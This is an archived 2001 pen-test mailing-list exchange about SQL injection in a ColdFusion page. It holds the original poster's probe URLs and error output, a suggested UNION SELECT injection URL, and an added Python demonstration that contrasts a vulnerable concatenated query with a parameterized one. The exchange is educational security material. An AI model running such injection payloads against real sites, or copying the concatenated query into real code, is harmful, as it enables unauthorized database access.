Re: CFM SQL injection

From: Kevin Spett (kspett@spidynamics.com)
Date: 12/18/01


From: "Kevin Spett" <kspett@spidynamics.com>
To: <Chili@SexMagnet.com>, <pen-test@security-focus.com>
Date: Mon, 17 Dec 2001 15:39:29 -0800


    It looks like the query that you're attacking isn't prepending and
appending quotes to your input. The string build probably looks a lil'
sumthin' like this:

Query = "SELECT FieldOne, FieldTwo, FieldThree FROM TableName WHERE PageID = " & strPageID

    This means that there is no need to use quotes in order to perform a
successful injection. So, try something like this:

http://www.server.com/page.cfm?page_id=9999 UNION SELECT OtherField FROM OtherTable WHERE 1=1

    Hopefully this will return an error complaining about an invalid table
name, or at least another error that may give you a better idea of what the
web application is doing with your argument.

Kevin Spett
Archbishop of SQL Injection
SPI Dynamics, Inc.
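An added illustration of the string build Kevin describes, not code from either poster: sqlite3 stands in for the ColdFusion/SQL Server pair, the schema and rows are constructed, and the hardened lookup adds the strict integer check and bound parameter a numeric CFPARAM is meant to provide. It runs the three probe values from the thread through both builds.

```python
import re
import sqlite3

# Constructed schema standing in for the page's TableName / OtherTable.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE TableName (PageID INTEGER, FieldOne TEXT, FieldTwo TEXT, FieldThree TEXT);
        INSERT INTO TableName VALUES (8, 'home', 'public', 'v1');
        CREATE TABLE OtherTable (OtherField TEXT);
        INSERT INTO OtherTable VALUES ('other-row');
    """)
    return conn

def vulnerable_lookup(conn, page_id):
    # Mirrors Kevin's guess: the raw query-string value is spliced in with no
    # quoting, so a quote mark is a syntax error and a bare UNION is valid SQL.
    sql = "SELECT FieldOne, FieldTwo, FieldThree FROM TableName WHERE PageID = " + page_id
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error as err:
        # The database error text is what the original poster saw echoed back.
        return "DB error: " + str(err)

def hardened_lookup(conn, page_id):
    # Strict check: only a plain decimal integer passes (so "8'" and "3,4" are
    # rejected before any SQL is built), then the value is bound, not spliced.
    if not re.fullmatch(r"[0-9]{1,9}", page_id):
        raise ValueError("page_id must be a plain integer")
    sql = "SELECT FieldOne, FieldTwo, FieldThree FROM TableName WHERE PageID = ?"
    return conn.execute(sql, (int(page_id),)).fetchall()

def hardened_rejects(conn, page_id):
    # True when the hardened path refuses the value outright.
    try:
        hardened_lookup(conn, page_id)
        return False
    except ValueError:
        return True

if __name__ == "__main__":
    db = make_db()
    # The three shapes of input seen in the thread.
    for probe in ("8", "8'", "3,4",
                  "9999 UNION SELECT OtherField FROM OtherTable WHERE 1=1"):
        print(repr(probe), "->", vulnerable_lookup(db, probe),
              "| hardened rejects:", hardened_rejects(db, probe))
```

With the concatenated build the quote and the comma reproduce the syntax errors from the original post, and the UNION with a mismatched column count produces a database error rather than rows, which is the diagnostic outcome Kevin expects; the hardened path never lets those values reach SQL.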

----- Original Message -----
From: "Charlie Liserne" <Chili@SexMagnet.com>
To: <pen-test@securityfocus.com>
Sent: Saturday, December 15, 2001 2:22 PM
Subject: CFM SQL injection

> Hello guys,
>
> I'm performing a pen-test against a website with ColdFusion installed. I
> obtain some error information, but I'm not able to do anything because the
> server never understands the parameters I send.
>
> The correct page is as follows:
> http://www.server.com/page.cfm?page_id=8
>
> My probes are the following:
>
> -------------------
> Request: http://www.server.com/page.cfm?page_id=8'
>
> Result:
> Invalid parameter type
> Cannot convert 19' to number.
> Please, check the ColdFusion manual for the allowed conversions between
> data types
> The error occurred while processing an element with a general identifier
> of (CFPARAM), occupying document position (5:1) to (5:61).
> Template: c:\blabla\page.cfm
> Query String: page_id=19'
> ------------------------
>
> So it isn't interpreting the ' and I don't know how to execute commands.
> It seems that it is not an SQL issue; instead it looks like a ColdFusion
> error.
> Another probe follows:
>
> --------------------
> Request: http://www.server.com/page.cfm?page_id=0
>
> Result:
> ODBC Error Code = 37000 (Syntax error or access violation)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Line 3: Incorrect syntax
> near '='.
> The error occurred while processing an element with a general identifier
> of (CFQUERY), occupying document position (15:1) to (16:65).
> ------------------
>
> Okay, I get an error from the SQL database. But I still don't know how to
> take advantage of it. I don't know the database name and I have very
> little info about it.
>
> Also, there are two more interesting probes:
> ---------------------------
> Request:http://www.server.com/page.cfm?page_id=3,
>
> Result:
> Invalid parameter type
> Cannot convert 3, to number.
> Please, check the ColdFusion manual for the allowed conversions between
> data types
> The error occurred while processing an element with a general identifier
> of (CFPARAM), occupying document position (5:1) to (5:61).
> ----------------------------
> Request: http://www.server.com/page.cfm?page_id=3,4
>
> Result:
> ODBC Error Code = 37000 (Syntax error or access violation)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Line 3: Incorrect syntax
> near ','.
> The error occurred while processing an element with a general identifier
> of (CFQUERY), occupying document position (6:1) to (6:72).
> -------------------------------
>
> Do you know how to exploit this (if it's possible)?
>
> Regards,
> Charlie.
>
>
> --------------------------------------------------------------------------
> This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
> Service. For more information on SecurityFocus' SIA service which
> automatically alerts you to the latest security vulnerabilities please see:
> https://alerts.securityfocus.com/
